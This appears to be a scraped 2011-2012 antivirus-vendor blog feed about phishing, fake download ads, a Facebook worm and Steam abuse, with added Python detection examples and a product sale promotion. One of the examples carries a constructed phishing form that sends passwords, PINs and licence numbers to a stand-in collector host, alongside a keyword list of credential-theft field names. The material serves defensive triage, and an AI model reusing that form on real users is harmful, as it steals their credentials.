2012-01-16T01:33:33.032-05:00Yes, we are :)
2012-01-12T03:59:51.336-05:00The United States Computer Emergency Readiness Team (better known as US-CERT) is the latest bait phishers are using to get people to install malware on their systems.
2012-01-12T00:00:40.695-05:00[Embedded YouTube video: http://www.youtube.com/embed/WkWpx6bi0a8]
2012-01-11T10:24:30.635-05:00In a recent release of GFI Software's VIPRE report, GFI Labs revealed that recycled tactics from cybercriminals will not cease this new year. Modifications on these tactics will only be slight, and will depend greatly on the kind of targets these online criminals are aiming at. To quote Senior Threat Researcher Christopher Boyd: "Most cyber-attacks at any given time rely on old techniques deployed with a new disguise. The reason we see them again and again is quite simply because they work, and we anticipate 2012 to bring many fresh takes on old scams."
2012-01-11T01:07:22.390-05:00Matthew, one of our malware researchers at the AV Labs, came upon a MediaFire link on a YouTube account that purports to direct users to a site where a crack code for the video game Pro Evolution Soccer 2012 (PES 2012) (otherwise known as World Soccer: Winning Eleven 2012) can be downloaded.
2012-01-04T03:53:23.397-05:00CommTouch, an Internet security service provider, has recently released its Internet Threats Trend Report for 2011. In this report, they highlight and analyze the various threats on Facebook that plagued users over the past year, such as social engineering ploys and the common methods of attack used. They also identify three ways criminals profit from targeting Facebook users. CommTouch provided an infographic (below) to present their analysis in a more coherent format.
2012-01-01T21:17:47.227-05:00"It's fine, trust me. I've done this stuff for a while now." Famous last words.
2011-12-30T05:40:23.936-05:00The rather awesome Steam gaming platform has a festive competition running at the moment - perform certain tasks in a selection of games drawn each day (or sign up to a few non-gaming activities like joining a forum, or linking your Steam and Facebook accounts) and receive a free random gift. I have to admit - I'm not doing very well so far.

That gift could be a redeemable coupon for a free game, a discount or... a lump of coal. All is not lost should you be handed a lump of coal - collect seven, and you can craft it into another randomly selected discount or free game.

This is, of course, where it all goes horribly wrong.

1) Gamers are exploiting the various "Indie Bundle" packs that go on sale periodically. This particular gaming bundle is a "pay what you want" affair, typically stuffed full of great games and additional offers should you pay a little extra (we still need to have that talk, Windows users). The latest Humble Indie Bundle went live not so long ago, and in a mad dash to create as much coal as possible to increase the chances of free games in Steam, gamers were paying the base amount for Indie Bundles redeemable against Steam accounts.

From Platform Nation: "For just 1 penny you can nab yourself a Steam redeemable key, and make your account valid for entry in the Epic Giveaway and the freebie prizes. That means you can create 100 accounts for just $1"

Whoops. They must have really gone to town on that one, given that the mass purchasing caused the price of the bundle to drop by more than 25 cents. Greedy gamers have also been targeting the "IndieGala Bundle", which gives a separate Steam account for each game - effectively five duplicate accounts for the lowest potential price of a penny.

Once you've got your hands on all those wonderful discount coupons and free games, you can potentially gift them to your "main" account and sit upon a throne of murkily acquired titles.

2) With shades of Xbox achievement tampering, people are distributing save files / text files to unlock the Steam game achievements needed to win coal / coupons. Here's an example of someone loading up a file not belonging to them, nabbing the required achievement in The Binding of Isaac and getting their hands on a free game. That's kind of dreadful, and by "kind of" I mean "completely".

3) Gamers are firing up a Steam achievements modding tool to ensure they nab as much coal as possible. Here's someone who clearly went on an "unlock all the things" rampage. As you can imagine, these antics are not proving popular with non-cheating gamers.

Coal farming isn't going unpunished, and Valve are starting to clamp down on anyone seen to be farming and / or exploiting. You may well be seeing many more examples on forums, posted up by vaguely annoyed gamers who want their accounts reactivated. If Valve catch you being naughty this festive season, they won't even leave you with coal. Top that, Santa...

Christopher Boyd
2011-12-22T01:50:12.842-05:00It's not long since The Hobbit trailer made a lot of people very excited, and already we're seeing fake claims of "watch this movie online" leading to surveys.
2011-12-20T06:53:52.643-05:00Robert Stetson, one of our malware researchers at the AV Labs, found a new phishing scam in the wild.
2011-12-16T10:26:08.513-05:00This social media "stalking" thing, to the best of my knowledge, all began on MySpace. We've seen it emerge on Twitter, too: our friends at Sophos wrote about a so-called "app" that Twitter had purportedly released to track a user's stalkers. Only this time, no such app is involved at all.

We've seen a tweet pointing users to the URL canbin(dot)ru, a domain created just late last month. Once users click it, they are redirected to twvitter(dot)com/user_login-sessions/?timed_out=1. It's a phishing page.

There are two things to note about it: (1) the URL, which plainly tries to play tricks with the eye (much like this one), and (2) the purported Twitter session that has "timed out". Naturally, if someone is logged in to Twitter and sees that message, they'll wonder for a second and then key in their user name and password anyway. Perhaps the only "error" in this attack is that the site attempts to access the real Twitter site the way a legitimate third-party app or site would, to make everything seem above board. However, Twitter requires (OAuth) tokens from such apps and sites. Since this is a bogus page, it has no token; thus it can't successfully redirect users to their actual accounts as it was supposed to.

We implore you, Dear Reader, to please exercise caution when clicking links in tweets. Even better: use your judgment on whether you'd believe a supposedly interesting tweet before considering visiting the URL that goes with it. More often than not, scam tweets are designed to sound this way precisely to make Internet users click them. Please don't be fooled. Just like the "Girl Killed Herself" scam that did the rounds on Twitter not so long ago, this, too, will probably go down in history as a classic attack involving two social networking giants. This is not comforting news.

As long as users continue to fall for scams, they will just keep coming.

Jovi Umawing (Thanks to Chris for spotting this)
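The first thing the post flags is the URL itself: twvitter(dot)com is one keystroke away from twitter.com. The following is an added example (not code from GFI, Sophos or Twitter) of the check a practitioner would script for a feed of tweeted links: undo the "(dot)" defanging, pull out the registrable domain, and compare it against a short brand list by edit distance, also catching the other common trick of burying a brand name in a subdomain. BRAND_DOMAINS is an assumed list; the last URL in the demo is constructed.

```python
"""Flag tweet/post URLs whose domain is a near-miss of a well-known brand.

Added example for this post, not code from GFI or Twitter. BRAND_DOMAINS is an
assumed, deliberately short list; the URLs fed in below are the defanged ones
from the post plus a constructed one.
"""
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Assumption: the domains we consider genuine (extend for your own watch list).
BRAND_DOMAINS = ["twitter.com", "facebook.com", "myspace.com"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert/delete/substitute at cost 1 each."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def host_of(url: str) -> str:
    """Lower-case host of a URL, undoing the '(dot)' / '[.]' defanging used in
    write-ups and tolerating a missing scheme."""
    cleaned = url.replace("(dot)", ".").replace("[.]", ".").strip()
    if "://" not in cleaned:
        cleaned = "http://" + cleaned
    return (urlsplit(cleaned).hostname or "").lower()


def classify(url: str, max_distance: int = 2) -> Tuple[str, Optional[str]]:
    """Return ('genuine', brand), ('lookalike', brand) or ('unrelated', None).

    A host is a lookalike when its registrable domain is within max_distance
    edits of a brand (twvitter.com vs twitter.com), or when a brand's name is
    used as a subdomain label of some other domain (twitter.com.evil.example).
    Assumption: two-label registrable domains; no public-suffix handling.
    """
    host = host_of(url)
    labels = host.split(".")
    registrable = ".".join(labels[-2:])
    best: Optional[Tuple[int, str]] = None
    for brand in BRAND_DOMAINS:
        if registrable == brand:
            return "genuine", brand
        if brand.split(".")[0] in labels[:-2]:
            return "lookalike", brand
        d = levenshtein(registrable, brand)
        if d <= max_distance and (best is None or d < best[0]):
            best = (d, brand)
    return ("lookalike", best[1]) if best else ("unrelated", None)


if __name__ == "__main__":
    for u in ["canbin(dot)ru",
              "twvitter(dot)com/user_login-sessions/?timed_out=1",
              "https://twitter.com/home",
              "http://twitter.com.login-check.example/"]:   # constructed
        print(f"{u:55} -> {classify(u)}")
```

The redirector canbin(dot)ru comes back "unrelated" (it is not pretending to be anyone), while the landing page is flagged as a lookalike of twitter.com; a real deployment would swap the two-label assumption for a public-suffix list and widen the brand list.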
2011-12-14T06:19:27.421-05:00Those of us who rely on the Internet for news updates have become familiar with Distributed Denial of Service (DDoS) attacks. Anonymous being in the headlines continuously for months has made this kind of online crime conspicuous, even ushering it unexpectedly into the mainstream.
2011-12-13T13:47:33.293-05:00I'm a big fan of Adblock Plus - it's a great add-on if you don't want to be hit over the head with any number of spinning, flashing adverts torn straight from the pages of Dante.

However, an interesting change has been made to the program with the release of 2.0, and some users are up in arms about it:

"Adblock Plus has also been configured to allow non-intrusive advertising. You can change this selection at any time in the filter preferences."

Blasphemy? Madness? Sparta? Who knows, but we now have a situation where users aren't happy about the opt-in-by-default setting, or indeed about approving adverts in general, no matter how limited the scope. There's a page on the Adblock Plus site that outlines some of the reasons for this change:

"You can allow some of the advertising that is considered not annoying. By doing this you support websites that rely on advertising but choose to do it in a non-intrusive way...In the long term the web will become a better place for everybody, not only Adblock Plus users. Without this feature we run the danger that increasing Adblock Plus usage will make small websites unsustainable."

As for why this is set live by default:

"If we ask users to enable this feature then most of them won't do it — simply because they never change any settings unless absolutely necessary. However, advertisers will only be interested in switching to better ways of advertising if the majority of Adblock Plus users has this feature enabled."

I'm not entirely convinced that advertisers so fond of flashy, spinning adverts from the back of beyond will tone their adverts down just because of this move - and hey, let's not forget that adverts meeting the requirements to be potentially given the green light ("static ads, text only, no attention grabbing images") can be just as dangerous, if not more so, than the flashy horrors still on the blocklist: a plain text link can point at an exploit page as easily as a banner can.

One good thing that may come out of this move is a possible reduction in infections.

No really, hear me out. I know a lot of people who have told me they never installed Adblock Plus or similar programs because their income was primarily driven by dedicated communities, and they wanted to put something back into those communities by not blocking their (static) advertisements. For example, a professional comic artist or writer is supported by their community; as a thank you, they won't block the adverts on the sites belonging to their fans or webcomic rings.

As a result, quite a few of them were hit by drive-by installs and exploits while browsing the web with no ad blocker in place.

If the Adblock Plus team do a good job of this, it might actually encourage more people to try the program and let a few (hopefully harmless) adverts through, while using their newfound installs to block malicious adverts elsewhere with a clean conscience. That can only be a good thing. However, much will depend on their vetting of the approved advert networks, their advertising methods, the kind of links those advertisers allow (and how they react to the bad apples that slip through the net), and whether or not the userbase approves of the opt-in-by-default setup.

We'll have to wait and see how this one plays out...

Christopher Boyd
2011-12-13T10:14:35.402-05:00Last week, our friends at ThreatPost posted about the ever-growing number of compromised websites hosting the Black Hole exploit kit. Black Hole attacks unpatched software on Windows systems: the operating system itself, but above all widely installed third-party components such as Java and Adobe Reader. Since the kit is already available in the black market (for free), we can only expect more infections and more news surrounding it.
2011-12-09T12:11:28.123-05:00Another round of bad ads in Bing and Yahoo search is making an unwelcome return. Bing has fake Firefox adverts; Yahoo has fake Adobe Flash adverts instead, located at gripwise(dot)com(dot)au/player/. The Gripwise site hosting that page appears to have been compromised.

Both sites will give you the Privacy Protection rogue, and the domain used for the fake Firefox download (ipropertyoffice(dot)com) has active exploits, so please steer clear. VirusTotal scores weigh in at 17/43, and we detect it as Win32.Malware!Drop.

At time of writing, Microsoft have been notified and have said the adverts have been pulled. All the same, be very careful when clicking on sponsored adverts for common downloads such as Firefox, Flash and others. As we've seen time and time again, scammers are all too eager to push malicious files on unsuspecting users.

Christopher Boyd (Thanks Matthew)
2011-12-07T20:24:41.449-05:00Our monthly Top Ten threat detection report for the month of November is now available to take a look at, along with information on some of the scams we've seen these past few weeks including emails tempting users with infected PDF files, food stamp shenanigans involving mobile phone services and phishing emails containing HTML form attachments, some of which are still doing the rounds.
2011-12-07T20:08:12.962-05:00If you see an email arrive in your mailbox with the above title, feel free to discard it - nothing good will come of it, unless your idea of "good" is "filling in all of your personal information into a fake banking webpage then sending it to a scammer."
2011-12-05T10:05:26.348-05:00Here's a rather amateur phish targeting Steam users, located at steambirthday(dot)com. No birthday prizes for guessing what this scam is all about:
2011-11-29T05:40:18.935-05:00Our friends at CSIS, a Danish security company, have spotted a worm spreading on the Facebook platform. In a recent news article penned by Peter Kruse, the worm is described as "a classic" in terms of how it infects Internet users: it uses stolen credentials to log in to Facebook accounts and then spams the victims' contacts. The message contains a link to a file purporting to be an image (the screenshot shows it with a .JPG extension), but it is actually a malicious screensaver. Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan capable of stealing user information from infected systems.
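Both this worm (a screensaver dressed up as a .JPG) and the fake Firefox/Flash downloads from the Bing and Yahoo adverts above rely on the name of a file saying one thing while its bytes say another. The following is an added example, not code from CSIS or GFI, of the triage check that catches that: sniff the leading "magic" bytes and compare them with what the filename claims, treating a Windows executable that carries an image name (photo.jpg, or the double-extension photo.jpg.scr that Explorer shows as photo.jpg) as its own verdict. The signature table is a small assumption and the sample files are constructed byte strings, not real malware.

```python
"""Does a file's content match what its name claims?

Added example for this post (and for the fake Firefox/Flash downloads above),
not code from CSIS or GFI. MAGIC and EXT_KIND are a small, assumed table; the
sample files at the bottom are constructed byte strings, not real malware.
"""
from typing import Dict, Optional

# Leading bytes for a handful of formats. Assumption: enough for the cases here.
MAGIC: Dict[str, bytes] = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pe":  b"MZ",          # Windows executables: .exe, .dll, and .scr screensavers
}
# What each extension should contain.
EXT_KIND: Dict[str, str] = {
    "jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif",
    "exe": "pe", "dll": "pe", "scr": "pe",
}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}


def sniff(data: bytes) -> Optional[str]:
    """Identify content by its magic bytes; None when not in the table."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def assess(filename: str, data: bytes) -> str:
    """Classify a (name, content) pair.

    'ok'                  extension and content agree
    'pe-with-image-name'  Windows executable whose name claims to be an image,
                          either photo.jpg (wrong extension) or photo.jpg.scr
                          (double extension; Explorer hides the known .scr)
    'mismatch'            content is a known type but not what the name says
    'unknown'             content not in the magic table
    """
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    kind = sniff(data)
    if kind is None:
        return "unknown"
    if kind == "pe" and (ext in IMAGE_EXTS or IMAGE_EXTS & set(parts[1:-1])):
        return "pe-with-image-name"
    if EXT_KIND.get(ext) == kind:
        return "ok"
    return "mismatch"


# Constructed samples: enough leading bytes to trip the signatures, nothing more.
SAMPLES = {
    "holiday.jpg":       b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 8,
    "holiday.jpg.scr":   b"MZ\x90\x00" + b"\x00" * 60,
    "party.jpg":         b"MZ\x90\x00" + b"\x00" * 60,
    "Firefox_Setup.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "banner.gif":        b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
    "notes.txt":         b"just text",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:20} {assess(name, data)}")
```

The point of the double-extension branch is that the user never sees ".scr": with "Hide extensions for known file types" on (the Windows default), holiday.jpg.scr is displayed as holiday.jpg, which is exactly the confusion the worm trades on. Note that Firefox_Setup.exe comes back "ok" here because a genuine installer is also a PE; an executable from an advert-driven download site still needs its signature and origin checked, which magic bytes alone cannot do.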
2011-11-28T17:48:11.449-05:00Patrick, our resident rogue AV expert from the AV Labs, has his eyes set on one particular family: FakeScanti. This rogue family first appeared in the first quarter of 2010 and has been on the radar ever since.
2011-11-28T11:05:31.191-05:00A company that makes installers distributing third-party software recently contacted us to query a detection. As it turns out, their installer was not the problem - they were partnering with a company whose toolbar continues to have a history of misleading and deceptive installs.

The interesting part of all this was the discussion over how the programs caught the attention of the end-user in the first place. Here, it was big green download buttons on download sites that looked (for all intents and purposes) like the button the end-user should click to begin their desired download. Instead, they would take them to vaguely named installer files.

In response, the basic argument set forth was "We want to be clean, but it's so difficult when everybody else is doing whatever they can to snag an install over a company attempting to play by the rules". On the surface of it, this would seem to be the case - pre-ticked checkboxes, dubious installers and poor notification inside the programs we download are bad enough, but poor choice of advert placement (and adverts that themselves look like Facebook notification prompts and other elements that would fool a regular web user) muddy the waters still further. You can see these on everything from search engines to garden-variety adverts on any number of websites you care to mention, and as social networks continue to grow in influence, so too do 2.0-themed adverts continue to vie for your attention.

Disappointingly, the bulk of the case set forth boils down to "everyone else is doing it". Here are some of the examples they sent over.

In the first, a rather large green tick and a "Download now" button completely overwhelm the simple text link that happens to be the one the end-user is looking for.

The second example has a rather prominent (and unrelated) download banner at the top and another download link off to the right - personally I don't feel this has as strong a case as the first example, although three green download buttons on the same page is always going to cause confusion for somebody.

In the third, the actual download button is fairly dwarfed by a larger one off to the right. Much like the other two, you can bet this has resulted in a number of "Wait, what?" style downloads.

None of this is new, of course - you can easily jump back to 2008 or earlier and see the same sort of thing taking place on Facebook application installer pages. It's worthwhile advising relatives you suspect will wander into these setups to be on their guard, because as far as many companies out there installing adware and other products are concerned, it's a case of Così fan tutte.

Christopher Boyd (Thanks Eric)
2011-11-24T11:42:59.403-05:00You saw it here first: YapBrowser has risen after being declared dead five years ago. The discovery was made by Chris Boyd himself, just a day before he presented at VB 2011 on rogue browsers, of which YapBrowser is one.
2011-11-23T21:00:16.191-05:00Over the previous few days, our research team here at GFI has noticed an uptick in bank phishes winding up in a few of our spam traps. This particular scam is unique in that it comes with an html file attachment which leads to a form that attempts to steal from the unsuspecting victim all types of identifying information from the standard pin and password to their Driver’s License number and even a (fake) description of the last transaction made on the account.
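An HTML attachment like the one described can be triaged without opening it in a browser: parse the forms, see where each one posts and which fields it collects. The following is an added example, not GFI's own tooling, that does exactly that with the standard-library HTML parser and flags a form when it sends credential- or identity-looking fields (PIN, password, driver's licence and so on) to a host outside the domain the e-mail claims to come from. The two attachments at the bottom are constructed to resemble the kind described, and SENSITIVE is an assumed list of field-name fragments.

```python
"""Triage an HTML attachment: where do its forms post and what do they ask for?

Added example for this post, not GFI's own tooling. The two attachments below
are constructed to resemble the kind described; SENSITIVE is an assumed list
of field-name fragments worth flagging.
"""
from html.parser import HTMLParser
from typing import Any, Dict, List
from urllib.parse import urlsplit

# Assumption: substrings that mark a field as asking for credentials/identity.
SENSITIVE = ("pin", "pass", "ssn", "social", "license", "licence",
             "card", "cvv", "account", "acct", "dob", "maiden")


class FormScanner(HTMLParser):
    """Collect each <form>'s action, method and the names of its fields."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict[str, Any]] = []
        self._cur: Dict[str, Any] = {}

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": a.get("method", "get").lower(), "fields": []}
            self.forms.append(self._cur)
        elif tag in ("input", "select", "textarea") and self._cur:
            name = a.get("name") or a.get("id")
            # Hidden fields count: they travel with the stolen data too.
            if name and a.get("type", "").lower() not in ("submit", "button", "image"):
                self._cur["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = {}


def triage(html: str, sender_domain: str) -> Dict[str, Any]:
    """Flag forms that send sensitive-looking fields to a host outside the
    domain the e-mail claims to come from (case-insensitive, subdomains allowed)."""
    scanner = FormScanner()
    scanner.feed(html)
    sender_domain = sender_domain.lower()
    findings = []
    for form in scanner.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        offsite = bool(host) and host != sender_domain and not host.endswith("." + sender_domain)
        sensitive = [n for n in form["fields"] if any(k in n.lower() for k in SENSITIVE)]
        findings.append({"action_host": host, "method": form["method"],
                         "offsite": offsite, "sensitive_fields": sensitive})
    verdict = "suspicious" if any(f["offsite"] and f["sensitive_fields"] for f in findings) else "no-finding"
    return {"verdict": verdict, "forms": findings}


# Constructed: a "verification" form posting to a third-party collector.
PHISH_ATTACHMENT = """<html><body><h2>Example Bank - Account Verification</h2>
<form action="http://collect.example.net/verify.php" method="post">
  <input type="hidden" name="campaign" value="nov2011">
  User ID: <input name="username"> Password: <input type="password" name="password">
  ATM PIN: <input name="atm_pin"> Driver's License #: <input name="drivers_license">
  Last transaction: <input name="last_transaction">
  <input type="submit" value="Verify">
</form></body></html>"""

# Constructed: a form that posts back to the sender's own domain.
BENIGN_ATTACHMENT = """<html><body>
<form action="https://online.examplebank.com/login" method="post">
  <input name="username"><input type="password" name="password">
  <input type="submit" value="Log in">
</form></body></html>"""

if __name__ == "__main__":
    for label, doc in (("phish", PHISH_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(label, triage(doc, "examplebank.com"))
```

The action host is usually the most useful artefact to come out of this: it is the collector the scammer actually needs to keep alive, so it is what you report and block. A form with an empty action, or one submitted by JavaScript rather than a plain action attribute, comes back with an empty host here and needs a manual look; the example deliberately does not guess.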
Here at GFI, we’re dedicated to providing quality antivirus software at exceptional values, and this Black Friday is no exception. Our Black Friday Sale features the biggest discounts of 2011 – up to 75% off.
Black Friday Sale
VIPRE Antivirus 2012 for $39.95 NOW $9.95!
VIPRE Internet Security 2012 for $49.95 NOW $19.95!
With prices this low, you can give the gift of PC security to Grandma, your sister, even that crazy uncle. Is Santa bringing a new laptop this year? Make sure he installs VIPRE on it first! It defends against viruses, worms, spyware, Trojans, rootkits and other Internet threats without slowing down your new (or old) PCs. The VIPRE 2012 editions feature the latest threat definitions and are easier to install and use than ever before.
This weekend’s VIPRE Black Friday Sale makes it easy and affordable to keep your family safe online this holiday season (and in years to come). So take advantage of the lowest prices of 2011 while the deals last.
2011-11-22T07:13:34.369-05:00Way back in 2009, Sophos covered a bit of viral "fun" on Twitter where users of that service revealed their "porn star name" - comprised of your "first pet" and your "first street".